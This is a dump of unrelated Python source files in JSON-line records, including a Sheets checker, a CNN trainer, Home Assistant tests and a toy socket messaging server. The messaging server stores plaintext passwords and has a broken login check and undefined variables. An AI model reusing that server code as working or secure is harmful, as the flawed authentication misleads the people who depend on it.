self._bit_rate = 0\n\n @property\n def input_node(self):\n return self._input_node\n\n @property\n def output_node(self):\n return self._output_node\n\n @property\n def signal_power(self):\n return self._signal_power\n\n @property\n def latency(self):\n return self._latency\n\n @latency.setter\n def latency(self, latency):\n self._latency = latency\n\n @property\n def snr(self):\n return self._snr\n\n @snr.setter\n def snr(self, snr):\n self._snr = snr\n\n @property\n def bit_rate(self):\n return self._bit_rate\n\n @bit_rate.setter\n def bit_rate(self, bit_rate):\n self._bit_rate = bit_rate\n","sub_path":"core/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":26685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"416627340","text":"#!/usr/bin/env python\nimport httplib2\nimport os\nimport glob\nimport string\nimport time\nimport pprint\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nimport xml.etree.ElementTree as ET\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Sheets API Python Quickstart'\n\nSPREADSHEET_ID = '1bV12DZtE0LfVpokKdsy9pu-zFLusoSH27Qoe6IqEVUU'\n\nSKIP_CONTRACTS = [\n 'BKK_BY_HZV',\n 'EK_BLN_HZV',\n 'EK_BW_HZV',\n 'EK_RLP_HZV',\n 'IKK_CL_BW_HZV',\n 'IKK_WL_HZV',\n 'LKK_BW_HZV',\n 'LKK_BY_HZV',\n 'LKK_WL_HZV',\n 'RV_KBS_BW_HZV',\n 'AOK_HE_HZV',\n\n 'AOK_BY_HZV_S12',\n 'AOK_BY_HZV_S15',\n 'EK_BY_HZV_S12',\n\n 'SK_FA_IV_RH',\n 'SK_HA_IV_RH',\n 'GWQ_HA_BV_TA',\n 'SK_FA_BV_CD',\n 'SK_HA_BV_CD',\n 'TK_HA_BV_TA',\n\n 'VAG_FA_GASTRO_BW',\n 'VAG_FA_KARDIO_BW',\n 'AOK_FA_GASTRO_BW',\n 'AOK_FA_KARDIO_BW',\n 'AOK_FA_NPPP_BW',\n 'AOK_FA_OC_BW',\n 'AOK_FA_URO_BW',\n 'BKK_FA_GASTRO_BW',\n 'BKK_FA_KARDIO_BW',\n 'BKK_FA_OC_BW',\n 'BKK_FA_URO_BW',\n 'BKK_BOSCH_FA_BW',\n\n 'BKK_VAG_BW',\n 'BKK_BOSCH_BW',\n\n 'AOK_MV_KV',\n 'BA_MV_KV',\n ]\n\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n credentials = tools.run_flow(flow, store, None)\n print('Storing credentials to ' + credential_path)\n return credentials\n\ndef main():\n credentials = get_credentials()\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n for contract_filename in glob.glob('*xml'):\n short_name, _ = contract_filename.split('_VSW_')\n if short_name in SKIP_CONTRACTS: continue\n print('Checking', short_name, '...', end=' ')\n requirements = get_requirements_from_xml(contract_filename)\n\n (progress, gsheet_contract) = get_requirements_from_gsheet(short_name, service)\n # remove Obsolete requirements\n cleaned = [c for c in gsheet_contract if progress[c] != 'Obsolete']\n compare(requirements, set(cleaned))\n time.sleep(2)\n\n print()\n print(len(SKIP_CONTRACTS), \"contracts not yet added\")\n\ndef compare(xml_requirements, gsheet_contract):\n # Check for things we need to ADD to the spreadsheet\n add = xml_requirements - gsheet_contract\n if add: print('\\t', 'ADD', sorted(add))\n\n remove = gsheet_contract - xml_requirements\n if remove: print('\\t','REMOVE', remove)\n\ndef get_current_progress(sheet):\n result = sheet.batchGet(spreadsheetId=SPREADSHEET_ID,\n ranges=['By Req!A4:A', 'By Req!B4:B']).execute()\n\n status = [x[0] for x in result['valueRanges'][0]['values']]\n function = [x[0] for x in result['valueRanges'][1]['values']]\n\n state = {}\n state.update(zip(function, status))\n\n return state\n\ndef get_column(short_name, sheet):\n SKIP_COLUMNS = ['Necessity', 'Title', 'Bing / Google Translated', 'Original', 'Characteristic', 'Remark']\n result = sheet.get(spreadsheetId=SPREADSHEET_ID, range='By Req!C3:ZZ3').execute()\n contracts = filter(lambda x: x not in SKIP_COLUMNS, result['values'][0])\n contracts = list(contracts)\n column_number = contracts.index(short_name)\n column_number += 2 # we did the query from C column so we need to adjust back\n\n wrap = column_number // 26\n final = string.ascii_uppercase[column_number % 26]\n if wrap > 0:\n column = string.ascii_uppercase[wrap - 1] + final\n else:\n column = final\n print('[', 'Column', column, ']')\n\n return column\n\ndef get_single_contract(column, sheet):\n range = 'By Req!%s4:%s' % (column, column)\n result = sheet.batchGet(spreadsheetId=SPREADSHEET_ID, ranges=['By Req!B4:B', range]).execute()\n function = [x[0] for x in result['valueRanges'][0]['values']]\n completed = [x != [] for x in result['valueRanges'][1]['values']]\n\n state = {}\n state.update(zip(function, completed))\n\n return set([k for k in state.keys() if state[k]]) \n\ndef get_requirements_from_gsheet(short_name, service):\n sheet = service.spreadsheets().values()\n progress = get_current_progress(sheet)\n column = get_column(short_name, sheet)\n contract = get_single_contract(column, sheet)\n return (progress, contract)\n\ndef get_requirements_from_xml(xml):\n tree = ET.parse(xml)\n root = tree.getroot()\n contracts = root.findall('.//funktionVertragssoftwareRef')\n return(set([c.attrib['ID'] for c in contracts]))\n\nif __name__ == '__main__':\n main()\n","sub_path":"contract_check.py","file_name":"contract_check.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"131694444","text":"#\r\n# https://pymotw.com/2/socket/tcp.html\r\n# https://docs.python.org/3/howto/sockets.html\r\n# Messaging Server v0.1.0\r\nimport socket\r\nimport sys\r\n\r\n# CONTRACT\r\n# start_server : string number -> socket\r\n# Takes a hostname and port number, and returns a socket\r\n# that is ready to listen for requests\r\ndef start_server (host, port):\r\n server_address = (host, port)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.bind(server_address)\r\n sock.listen(1)\r\n return sock\r\n\r\n# CONTRACT\r\n# get_message : socket -> string\r\n# Takes a socket and loops until it receives a complete message\r\n# from a client. Returns the string we were sent.\r\n# No error handling whatsoever.\r\ndef get_message (sock):\r\n chars = []\r\n connection, client_address = sock.accept()\r\n print (\"Connection from [{0}]\".format(client_address))\r\n try:\r\n while True:\r\n char = connection.recv(1)\r\n if char == b'\\0':\r\n break\r\n if char == b'':\r\n break\r\n else:\r\n\t # print(\"Appending {0}\".format(char))\r\n chars.append(char.decode(\"utf-8\") )\r\n finally:\r\n return (''.join(chars), connection)\r\n\r\n# CONTRACT\r\n# socket -> boolean\r\n# Shuts down the socket we're listening on.\r\ndef stop_server (sock):\r\n return sock.close()\r\n\r\n# DATA STRUCTURES\r\n# The structures for your server should be defined and documented here.\r\n\r\n# SERVER IMPLEMENTATION\r\n# The implementation of your server should go here.\r\nUD = {} #UserData {:[,]}\r\nMBX = {} #Mailbox {:}\r\nIMQ = [] #Messages []\r\n\r\ndef is_login(UD, username):\r\n user = UD[username]\r\n loginstatus = user[1]\r\n return loginstatus\r\n \r\n# CONTRACT\r\ndef handle_message (msg):\r\n if \"LOGIN\" in msg:\r\n # Username\r\n username = msg.split(\" \")[1]\r\n # Password\r\n password = msg.split(\" \")[2]\r\n # IF the user is register status equals None?\r\n if UD.get(username) == None:\r\n return(\"ERROR\",\"User does not exsited\")\r\n # ELIF the user is equal to the givin password\r\n elif UD[username][1] != password:\r\n return(\"ERROR\",\"Password invald\")\r\n # ELSE login \r\n else:\r\n login_status = is_login(UD[username], username)\r\n login_status = True\r\n return(\"LOGIN\", \"{0} Login\".format(username))\r\n\t \r\n elif \"DUMP\" in msg:\r\n # Get the username\r\n #username = msg.split(\" \")[1]\r\n # Checking user status\r\n #if is_login(UD[username]) == True:\r\n print(MBX)\r\n print(IMQ)\r\n return (\"OK\", \"Dumped.\")\r\n #else:\r\n # return (\"Error\", \"Current user is not login\")\r\n\t \r\n elif \"REGISTER\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n # Get the password\r\n password = msg.split(\" \")[2]\r\n # Create an empty list of messages\r\n UD[username] = [password,False]\r\n MBX[username] = []\r\n return (\"OK\", \"Registered. {0}/n {1}/n {2}\".format(UD,MBX,IMQ))\r\n \r\n elif \"MESSAGE\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n print(\"Username: {0}\".format(username))\r\n if is_login(UD[username], username) == True:\r\n # Get the content; slice everything after\r\n # the word MESSAGE\r\n content = msg.split(\" \")[2:]\r\n # Put the content back together, and put \r\n # it on the incoming message queue.\r\n IMQ.insert(0, \" \".join(content))\r\n return (\"OK\", \"Sent message.\")\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n \r\n elif \"STORE\" in msg:\r\n # Get the username\r\n #username = msg.split(\" \")[1]\r\n #if is_login(UD[username]) == True:\r\n queued = IMQ.pop()\r\n print(\"Message in queue:\\n---\\n{0}\\n---\\n\".format(queued))\r\n MBX[username].insert(0, queued)\r\n return (\"OK\", \"Stored message.\")\r\n #else:\r\n # return (\"Error\", \"Current user is not login\")\r\n \r\n elif \"COUNT\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username], username) == True:\r\n return (\"SEND\", \"COUNTED {0}\".format(len(MBX[username])))\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n elif \"DELMSG\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username]) == True:\r\n MBX[username].pop(0)\r\n return (\"OK\", \"Message deleted.\")\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n\t \r\n elif \"GETMSG\" in msg:\r\n # Get the username\r\n username = msg.split(\" \")[1]\r\n if is_login(UD[username], username) == True:\r\n first = MBX[username][0]\r\n print (\"First message:\\n---\\n{0}\\n---\\n\".format(first) )\r\n return (\"SEND\", first)\r\n else:\r\n return (\"Error\", \"Current user is not login\")\r\n else:\r\n print(\"NO HANDLER FOR CLIENT MESSAGE: [{0}]\".format(msg))\r\n return (\"KO\", \"No handler found for client message.\")\r\n\r\nif __name__ == \"__main__\":\r\n # Check if the user provided all of the \r\n # arguments. The script name counts\r\n # as one of the elements, so we need at \r\n # least three, not fewer.\r\n \"\"\"\r\n if len(sys.argv) < 3:\r\n print (\"Usage: \")\r\n print (\" python server.py \")\r\n print (\" e.g. python server.py localhost 8888\")\r\n print\r\n sys.exit()\r\n \"\"\"\r\n #host = sys.argv[1]\r\n host = \"Localhost\"\r\n #port = int(sys.argv[2])\r\n port = 8888\r\n sock = start_server(host, port)\r\n print(\"Running server on host [{0}] and port [{1}]\".format(host, port))\r\n \r\n RUNNING = True\r\n while RUNNING:\r\n message, conn = get_message(sock)\r\n print(\"MESSAGE: [{0}]\".format(message))\r\n result, msg = handle_message(message)\r\n print (\"Result: {0}\\nMessage: {1}\\n\".format(result, msg))\r\n if result == \"ERROR\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"LOGIN\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"OK\":\r\n conn.sendall(bytes(\"{0}\\0\".format(result)))\r\n elif result == \"SEND\":\r\n conn.sendall(bytes(\"{0}\\0\".format(msg)))\r\n else:\r\n print(\"'else' reached.\")\r\n RUNNING = False\r\n conn.close()\r\n\r\nstop_server(sock)\r\n","sub_path":"Examples/Networking/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440835345","text":"#!/usr/bin/env python\n\nimport logging\n\nlogger = logging.getLogger('arbitrage')\nlogger.setLevel(logging.DEBUG)\nfh = logging.FileHandler('history_arbitrage.log')\nformatter = logging.Formatter('%(asctime)s - %(message)s')\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n\n#livequote = False\nlivequote = True #This gets the quotes online everytime. Time consuming.\n\n","sub_path":"projectconfig.py","file_name":"projectconfig.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"461398470","text":"from multiprocessing import Process\nfrom Bluetin_Echo import Echo\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM) #Käytetään BCM-mäppäystä pinnien hallintaan\nTRIGGER_PIN = 23 #Liipasimen BCM-pinni on 23\nECHO_PIN = 24 #Äänen kaiun BCM-pinni on 24\nGPIO.setwarnings(False)\ndef distanceMeasure():\n while True:\n speed_of_sound = 340\n echo = Echo(TRIGGER_PIN, ECHO_PIN, speed_of_sound) #Echo-mittauksen asetus\n samples = 10 #Montako mittausta otetaan keskiarvolaskentaan\n result = echo.read('cm', samples) # Hae etäisyysmittausten keskiarvo cm:einä\n print(result, 'cm') # Tuloksen tulostaminen\n # GPIO cleanup\n echo.stop()\n\ndef main():\n p1 = Process(target=distanceMeasure, args=())\n p1.start()\n #p1.join()\n print('pääohjelma suoritettu')\n\nif __name__ == '__main__':\n main()","sub_path":"PointCollegeSensorControl/Python/EtaisyysMittausBluetin.py","file_name":"EtaisyysMittausBluetin.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"71735780","text":"\"\"\"Upgrading zergling speed\"\"\"\nfrom sc2.constants import RESEARCH_ZERGLINGMETABOLICBOOST, ZERGLINGMOVEMENTSPEED\n\n\nclass UpgradeMetabolicBoost:\n \"\"\"Ok for now\"\"\"\n\n def __init__(self, ai):\n self.ai = ai\n\n async def should_handle(self, iteration):\n \"\"\"Requirements to run handle\"\"\"\n local_controller = self.ai\n if not local_controller.pools.ready.idle:\n return False\n\n return not local_controller.already_pending_upgrade(ZERGLINGMOVEMENTSPEED) and local_controller.can_afford(\n RESEARCH_ZERGLINGMETABOLICBOOST\n )\n\n async def handle(self, iteration):\n \"\"\"Execute the action of upgrading zergling speed\"\"\"\n local_controller = self.ai\n pool = local_controller.pools.ready\n local_controller.add_action(pool.first(RESEARCH_ZERGLINGMETABOLICBOOST))\n return True\n","sub_path":"actions/upgrades/metabolicboost.py","file_name":"metabolicboost.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"180103715","text":"\n\nfrom xai.brain.wordbase.nouns._bust import _BUST\n\n#calss header\nclass _BUSTING(_BUST, ):\n\tdef __init__(self,): \n\t\t_BUST.__init__(self)\n\t\tself.name = \"BUSTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bust\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_busting.py","file_name":"_busting.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"252608245","text":"# Simple CNN model for CIFAR-10\nimport numpy\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.image_data_format()\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n# load data\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\n# normalize inputs from 0-255 to 0.0-1.0\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n# Create the model\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(32, 32, 3), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(128, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n#Flatten layer\nmodel.add(Flatten())\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1024, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(num_classes, activation='softmax'))\n# Compile model\nepochs = 25\nlrate = 0.01\ndecay = lrate/epochs\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nprint(model.summary())\n\n# Fit the model\nhistory = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=32)\n\nmodel.save('cifar10.h5')\nmodel = load_model('cifar10.h5')\n\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\n# Predicting the first four images of dataset\nimage=model.predict_classes(X_train[[1],:])\nprint(image[0])\n\npredicted_image=y_test\nfor i in range(2,6):\n plt.imshow(X_test[i,:,:])\n plt.show()\n image=model.predict_classes(X_test[[i],:])\n print(\"actual\",predicted_image[i],\"predicted\",image[0])\n\n# Plotting the accuracy using history object\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('Model Accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n# Plotting the Loss using history object\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model Loss')\nplt.ylabel('Loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()","sub_path":"ICP4DL/SourceCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"378093919","text":"\"\"\"Test the bootstrapping.\"\"\"\n# pylint: disable=protected-access\nimport asyncio\nimport os\nfrom unittest.mock import Mock, patch\nimport logging\n\nimport homeassistant.config as config_util\nfrom homeassistant import bootstrap\nimport homeassistant.util.dt as dt_util\n\nfrom tests.common import (\n patch_yaml_files, get_test_config_dir, mock_coro, mock_integration,\n MockModule)\n\nORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE\nVERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# prevent .HA_VERSION file from being written\n@patch(\n 'homeassistant.bootstrap.conf_util.process_ha_config_upgrade', Mock())\n@patch('homeassistant.util.location.async_detect_location_info',\n Mock(return_value=mock_coro(None)))\n@patch('os.path.isfile', Mock(return_value=True))\n@patch('os.access', Mock(return_value=True))\n@patch('homeassistant.bootstrap.async_enable_logging',\n Mock(return_value=True))\ndef test_from_config_file(hass):\n \"\"\"Test with configuration file.\"\"\"\n components = set(['browser', 'conversation', 'script'])\n files = {\n 'config.yaml': ''.join('{}:\\n'.format(comp) for comp in components)\n }\n\n with patch_yaml_files(files, True):\n yield from bootstrap.async_from_config_file('config.yaml', hass)\n\n assert components == hass.config.components\n\n\n@patch('homeassistant.bootstrap.async_enable_logging', Mock())\n@asyncio.coroutine\ndef test_home_assistant_core_config_validation(hass):\n \"\"\"Test if we pass in wrong information for HA conf.\"\"\"\n # Extensive HA conf validation testing is done\n result = yield from bootstrap.async_from_config_dict({\n 'homeassistant': {\n 'latitude': 'some string'\n }\n }, hass)\n assert result is None\n\n\nasync def test_async_from_config_file_not_mount_deps_folder(loop):\n \"\"\"Test that we not mount the deps folder inside async_from_config_file.\"\"\"\n hass = Mock(\n async_add_executor_job=Mock(side_effect=lambda *args: mock_coro()))\n\n with patch('homeassistant.bootstrap.is_virtual_env', return_value=False), \\\n patch('homeassistant.bootstrap.async_enable_logging',\n return_value=mock_coro()), \\\n patch('homeassistant.bootstrap.async_mount_local_lib_path',\n return_value=mock_coro()) as mock_mount, \\\n patch('homeassistant.bootstrap.async_from_config_dict',\n return_value=mock_coro()):\n\n await bootstrap.async_from_config_file('mock-path', hass)\n assert len(mock_mount.mock_calls) == 1\n\n with patch('homeassistant.bootstrap.is_virtual_env', return_value=True), \\\n patch('homeassistant.bootstrap.async_enable_logging',\n return_value=mock_coro()), \\\n patch('homeassistant.bootstrap.async_mount_local_lib_path',\n return_value=mock_coro()) as mock_mount, \\\n patch('homeassistant.bootstrap.async_from_config_dict',\n return_value=mock_coro()):\n\n await bootstrap.async_from_config_file('mock-path', hass)\n assert len(mock_mount.mock_calls) == 0\n\n\nasync def test_load_hassio(hass):\n \"\"\"Test that we load Hass.io component.\"\"\"\n with patch.dict(os.environ, {}, clear=True):\n assert bootstrap._get_domains(hass, {}) == set()\n\n with patch.dict(os.environ, {'HASSIO': '1'}):\n assert bootstrap._get_domains(hass, {}) == {'hassio'}\n\n\nasync def test_empty_setup(hass):\n \"\"\"Test an empty set up loads the core.\"\"\"\n await bootstrap._async_set_up_integrations(hass, {})\n for domain in bootstrap.CORE_INTEGRATIONS:\n assert domain in hass.config.components, domain\n\n\nasync def test_core_failure_aborts(hass, caplog):\n \"\"\"Test failing core setup aborts further setup.\"\"\"\n with patch('homeassistant.components.homeassistant.async_setup',\n return_value=mock_coro(False)):\n await bootstrap._async_set_up_integrations(hass, {\n 'group': {}\n })\n\n assert 'core failed to initialize' in caplog.text\n # We aborted early, group not set up\n assert 'group' not in hass.config.components\n\n\nasync def test_setting_up_config(hass, caplog):\n \"\"\"Test we set up domains in config.\"\"\"\n await bootstrap._async_set_up_integrations(hass, {\n 'group hello': {},\n 'homeassistant': {}\n })\n\n assert 'group' in hass.config.components\n\n\nasync def test_setup_after_deps_all_present(hass, caplog):\n \"\"\"Test after_dependencies when all present.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='first_dep',\n async_setup=gen_domain_setup('first_dep'),\n partial_manifest={\n 'after_dependencies': ['root']\n }\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'first_dep': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'first_dep', 'second_dep']\n\n\nasync def test_setup_after_deps_not_trigger_load(hass, caplog):\n \"\"\"Test after_dependencies does not trigger loading it.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='first_dep',\n async_setup=gen_domain_setup('first_dep'),\n partial_manifest={\n 'after_dependencies': ['root']\n }\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' not in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'second_dep']\n\n\nasync def test_setup_after_deps_not_present(hass, caplog):\n \"\"\"Test after_dependencies when referenced integration doesn't exist.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'first_dep': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' not in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'second_dep']\n","sub_path":"tests/test_bootstrap.py","file_name":"test_bootstrap.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"396921089","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 13 22:11:13 2019\r\n\r\n@author: hjiang\r\n\"\"\"\r\n\r\n\"\"\"\r\nGiven an array of integers that is already sorted in ascending order, \r\nfind two numbers such that they add up to a specific target number.\r\n\r\nThe function twoSum should return indices of the two numbers such that they add up to the target, \r\nwhere index1 must be less than index2.\r\n\r\nNote:\r\n\r\nYour returned answers (both index1 and index2) are not zero-based.\r\nYou may assume that each input would have exactly one solution and you may not use the same element twice.\r\nExample:\r\n\r\nInput: numbers = [2,7,11,15], target = 9\r\nOutput: [1,2]\r\nExplanation: The sum of 2 and 7 is 9. Therefore index1 = 1, index2 = 2.\r\n只有一个解而且一个数字只能用一次\r\n\"\"\"\r\n\r\n# Time: O(n)\r\n# Space: O(1)\r\n\r\nclass Solution(object):\r\n def twoSum(self, nums, target):\r\n start, end = 0, len(nums) - 1\r\n\r\n while start != end:\r\n sum = nums[start] + nums[end]\r\n if sum > target:\r\n end -= 1\r\n elif sum < target:\r\n start += 1\r\n else:\r\n return [start + 1, end + 1]#这个地方是因为题目中的序号偏了一位","sub_path":"Python3.6/167-Py3-E-Two Sum II - Input array is sorted.py","file_name":"167-Py3-E-Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"158200381","text":"import sys\nimport os\nimport re\nfrom requests.utils import urlparse\n\nimport torch\nimport torch.nn as nn\nfrom torch.hub import _download_url_to_file as _download_url_to_file\nfrom MobileNetV2 import MobileNetV2 # https://github.com/tonylins/pytorch-mobilenet-v2\n\nHASH_REGEX = re.compile(r'-([a-f0-9]*)\\.')\nmbnetv2_url = 'https://docs.google.com/uc?id=1jlto6HRVD3ipNkAl1lNhDbkBp7HylaqR&export=download'\nmbnetv2_hash = 'ecbe2b568c8602549fa9e1d5833c63848f490a48d92e5d224d1eb2063e152cf8'\nmbnetv2_fname = 'mobilenet_v2.pth.tar'\n\n\ndef load_url(url, model_dir=None, map_location=None, progress=True, hash_prefix=None, filename=None):\n if model_dir is None:\n torch_home = os.path.expanduser(os.getenv('TORCH_HOME', '~/.torch'))\n model_dir = os.getenv('TORCH_MODEL_ZOO', os.path.join(torch_home, 'models'))\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n parts = urlparse(url)\n if filename is None: filename = os.path.basename(parts.path)\n cached_file = os.path.join(model_dir, filename)\n if not os.path.exists(cached_file):\n sys.stderr.write('Downloading: \"{}\" to {}\\n'.format(url, cached_file))\n if hash_prefix is None: hash_prefix = HASH_REGEX.search(filename).group(1)\n _download_url_to_file(url, cached_file, hash_prefix, progress=progress)\n return torch.load(cached_file, map_location=map_location)\n\n\ndef mbnetv2(pretrained=False, **kwargs):\n model = MobileNetV2(width_mult=1, **kwargs)\n if pretrained:\n model.load_state_dict(load_url(mbnetv2_url, hash_prefix=mbnetv2_hash, filename=mbnetv2_fname))\n return model\n\n\ndef _mbnetv2_split(m: nn.Module): return (m[0][0][6], m[0][0][12], m[1])\n","sub_path":"mbnetv2.py","file_name":"mbnetv2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"296697550","text":"gradeList = list() # [\"midterm\", \"final\", \"homework\"]\nstudentList = list() #[\"Name\",\"Surname\"]\nstudentInfo = {\n \"studentName\": studentList,\n \"studentGrade\" : 